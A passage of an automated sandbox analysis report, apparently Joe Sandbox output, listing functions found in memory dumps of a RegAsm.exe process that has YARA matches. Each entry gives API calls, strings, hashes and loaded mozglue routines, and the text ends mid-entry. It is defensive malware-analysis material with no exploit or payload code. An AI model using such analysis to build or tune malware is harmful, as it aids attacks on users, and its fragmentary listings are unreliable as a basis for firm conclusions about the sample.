_free.LIBCMT ref: 00428B7D
_free.LIBCMT ref: 00428B83
__copytlocinfo_nolock.LIBCMT ref: 00428B92
__setlocale_nolock.LIBCMT ref: 00428B9F
_free.LIBCMT ref: 00428BB8
__setmbcp_nolock.LIBCMT ref: 00428BCA
_free.LIBCMT ref: 00428BD8
_free.LIBCMT ref: 00428BEC

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction ID: 316f7d86b509052675ed64499f597221969422cd52b172cd7ffbd25416df4cfd
Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction Fuzzy Hash: 392126B1705621BADB217F26F802D4FBBE0DF91758BA0842FF48446261DF39A840C65D

Function 004015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
GetLastError.KERNEL32 ref: 0040160C
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
GetWindowContextHelpId.USER32(00000000), ref: 0040161B
GetWindowLongW.USER32(00000000,00000000), ref: 00401623
RegisterClassW.USER32(00000000), ref: 0040162A
IsWindowVisible.USER32(00000000), ref: 00401631
ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
HeapFree.KERNEL32(00000000), ref: 0040165D

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE

Function 6C0C8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C08EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C08EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C0CB392,?,?,00000001), ref: 6C0C91F4

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

Strings

name, xrefs: 6C0C8F16
timeline-memory, xrefs: 6C0C9088
data, xrefs: 6C0C90E8
timeline-fileio, xrefs: 6C0C90A4
timeline-overview, xrefs: 6C0C907A
stack-chart, xrefs: 6C0C90B2
timeline-ipc, xrefs: 6C0C9096
marker-table, xrefs: 6C0C906C
marker-chart, xrefs: 6C0C905E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: dfe1c7c0a44ca55138d54c0d8f9e5c274d2d58069362ed7e6fc6184e20bee0e8
Instruction ID: 28902ef1a5891afea66f734e3482ea904b74f8d34ff191dcc5bfa9a594b3e885
Opcode Fuzzy Hash: dfe1c7c0a44ca55138d54c0d8f9e5c274d2d58069362ed7e6fc6184e20bee0e8
Instruction Fuzzy Hash: D9B1B2B1B012099BDB04CF98C492BEEBBF5BF85718F204519D915ABF80DB31A945CBD1

Function 6C0AC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0AC5A3
WideCharToMultiByte.KERNEL32 ref: 6C0AC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C0AC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C0ACA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C0ACA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0ACAA5

Strings

(null), xrefs: 6C0AC596
0, xrefs: 6C0AD30A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 8025afd6400ec22b95834063536037eb42d74d67d3690c8fb6817c4dabce7f8f
Instruction ID: 758284a5bd4ec24c55bfc77789d0254331379b3a09d8c6c98a24294bc18f60c4
Opcode Fuzzy Hash: 8025afd6400ec22b95834063536037eb42d74d67d3690c8fb6817c4dabce7f8f
Instruction Fuzzy Hash: 30A1CF317093419FDB00DFA8C54475EBBF1AF8A788F05891DE899D7642DB36E806CB82

Function 6C0AC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0AC784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0AC801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C0AC83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0AC891

Strings

NAN, xrefs: 6C0AC7AD
nan, xrefs: 6C0AC7A8
inf, xrefs: 6C0AC78F
INF, xrefs: 6C0AC794

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: eed97e540066ef01d5b88debf8db11934f6e531e9f836faeb4ea2a18734d79c2
Instruction ID: 943ee6942f834b62c7b668c15f2fe4103fac6276f8da18bbf14a48d613094555
Opcode Fuzzy Hash: eed97e540066ef01d5b88debf8db11934f6e531e9f836faeb4ea2a18734d79c2
Instruction Fuzzy Hash: 445181706087408BDB04DFACC58139AFBF0BF8A348F418A2DE9D5A7651EB71D985CB42

Function 6C083480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C083492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0834A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0834EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C08350E
__Init_thread_footer.LIBCMT ref: 6C083522
__aulldiv.LIBCMT ref: 6C083552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C08357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C083592

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C083508
kernel32.dll, xrefs: 6C0834EA

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: a9edaa9ecc6cb73065df7c2bdc1b080898a9c4c39f2d42ed26476d38e07f3210
Instruction ID: 455d1d70f07d44549645236aad37563dc84e4bc0af1ba813669da12c1894d895
Opcode Fuzzy Hash: a9edaa9ecc6cb73065df7c2bdc1b080898a9c4c39f2d42ed26476d38e07f3210
Instruction Fuzzy Hash: 30316A71F012099BDF04DFB9C849BAE77F9EB8A304F108429E515A3690EF74A905DBA0

Function 0042660D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00426634
_free.LIBCMT ref: 00426642
_free.LIBCMT ref: 0042664D
_free.LIBCMT ref: 00426621

Part of subcall function 0041D93B: HeapFree.KERNEL32(00000000,00000000,?,0041D18F,00000000,0043B6F4,0041D1D6,0040EEBE,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4), ref: 0041D951
Part of subcall function 0041D93B: GetLastError.KERNEL32(?,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4,?,?,?), ref: 0041D963

___free_lc_time.LIBCMT ref: 0042666B
_free.LIBCMT ref: 00426676
_free.LIBCMT ref: 0042669B
_free.LIBCMT ref: 004266B2
_free.LIBCMT ref: 004266C1

Strings

xLC, xrefs: 0042665B

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID: xLC
API String ID: 3704779436-381350105
Opcode ID: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction ID: fdfe39178027f3e5e6c57af64549801535ecf2e9aa55874642047572a4db4e51
Opcode Fuzzy Hash: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction Fuzzy Hash: 421194F2A10311ABDF206F76E985B9BB3A5EB01308F95093FE14897251CB3C9C91CA1C

Function 6C084480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C0C4843,?), ref: 6C0845F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C0C4843,?), ref: 6C08468A
free.MOZGLUE(?,?,?,?,?,?,6C0C4843,?), ref: 6C0846C9
free.MOZGLUE(?), ref: 6C0846EF
free.MOZGLUE(?), ref: 6C084712
free.MOZGLUE(?), ref: 6C084735
free.MOZGLUE(?), ref: 6C084758
free.MOZGLUE(?), ref: 6C08477B
free.MOZGLUE(?), ref: 6C08479E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 12ce181904aed868654ffdbba7c362d647fe33373ce387607da8edfe4470bf73
Instruction ID: 07f151afcf9ad145a57ab495da7aeb3a7c88807ceb4df5aae2a382bc756b9095
Opcode Fuzzy Hash: 12ce181904aed868654ffdbba7c362d647fe33373ce387607da8edfe4470bf73
Instruction Fuzzy Hash: ABB1F371A02110DFDF18CFACD8B076D77EAAF45328F588669E416DBBC6D73099408B81

Function 6C0EAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C0EAC52
CreateFileMappingW.KERNEL32 ref: 6C0EAC7D
GetSystemInfo.KERNEL32 ref: 6C0EAC98
MapViewOfFile.KERNEL32 ref: 6C0EACB0
GetSystemInfo.KERNEL32 ref: 6C0EACCD
MapViewOfFile.KERNEL32 ref: 6C0EAD05
UnmapViewOfFile.KERNEL32 ref: 6C0EAD1C
CloseHandle.KERNEL32 ref: 6C0EAD28
UnmapViewOfFile.KERNEL32 ref: 6C0EAD37
CloseHandle.KERNEL32 ref: 6C0EAD43
CloseHandle.KERNEL32 ref: 6C0EAD67

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 0856e975aa39dca098e5b82cb616e417fd471d958a542a8c0d233758734e957f
Instruction ID: 76c074e7f81aac8bd5712f24e15cc34f5c73a4b24a7e4586cbba8fc0e1fb9a38
Opcode Fuzzy Hash: 0856e975aa39dca098e5b82cb616e417fd471d958a542a8c0d233758734e957f
Instruction Fuzzy Hash: 0C313EB1A047048FDB00AF78D64826EBBF1BF89305F11492DE99597351EF709588CB82

Function 0041B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00CD2548), ref: 0041B9C5
GetFileSize.KERNEL32(?,00000000), ref: 0041BA3E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BA5A
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BA6E
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BA77
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA87
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BAA5
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BAB5

Strings

, xrefs: 0041BA11

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction ID: 2f96ef8e8c352da0c6fd23b8bc0b50d76e073618b9a0ce70252d9e73764e8c17
Opcode Fuzzy Hash: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction Fuzzy Hash: 4A51F3B1D0021CAFDB28DF99DC85AEEBBB9EF04344F10442AE511E6260D7789D85CF94

Function 6C0BF2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0BD9DB), ref: 6C0BF2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C0BF2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C0BF386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C0BF347

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C0BF3C8
free.MOZGLUE(00000000,00000000), ref: 6C0BF3F3
free.MOZGLUE(00000000,00000000), ref: 6C0BF3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6C0BF413

Strings

ntdll.dll, xrefs: 6C0BF2F0

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: 5dab2b2929883a323292c7c6e8459794aa30cc046a4bb4d69621c75366ea6d2d
Instruction ID: 4c217a4599da1fed492e7dce0aa273c26f3c19573a1dc3254bcf0f08dd7c1a4f
Opcode Fuzzy Hash: 5dab2b2929883a323292c7c6e8459794aa30cc046a4bb4d69621c75366ea6d2d
Instruction Fuzzy Hash: B84112B9F082048BDB04CF68D84579EB7F8EF49758F24402DD82AA7B81EB32A445C784

Function 6C0E6A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C10F618), ref: 6C0E6A68
GetCurrentProcess.KERNEL32 ref: 6C0E6A7D
GetCurrentProcess.KERNEL32 ref: 6C0E6AA1
EnterCriticalSection.KERNEL32(6C10F618), ref: 6C0E6AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0E6AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0E6B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C0E6B65
LeaveCriticalSection.KERNEL32(6C10F618,?,?), ref: 6C0E6B83

Strings

SymInitialize, xrefs: 6C0E6BA3

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: a52ab0e1c865ceb5e668c1ea98e08803a4b7e47f4b3fec25d9819aa0bd60949e
Instruction ID: 0d0ff137180b8c1a7aa1717f2c34d91827709dd7de639c9c7c51e774922d5c5b
Opcode Fuzzy Hash: a52ab0e1c865ceb5e668c1ea98e08803a4b7e47f4b3fec25d9819aa0bd60949e
Instruction Fuzzy Hash: 18417D707453449FDB00DF64D889B9A3BF8EB4A304F08457DEA98DB282DF719548DB61

Function 0040DB7F Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0040DBBB
strchr.MSVCRT ref: 0040DBCD
strchr.MSVCRT ref: 0040DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
strcpy_s.MSVCRT ref: 0040DC6F

Strings

0123456789ABCDEF, xrefs: 0040DB99
`Tu, xrefs: 0040DBAA

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF$`Tu
API String ID: 453150750-1497512213
Opcode ID: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction ID: be699800860e389eb7f033a368984428232de7924aec9246af203248711cb49e
Opcode Fuzzy Hash: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction Fuzzy Hash: 18315D71D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94

Function 6C099620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

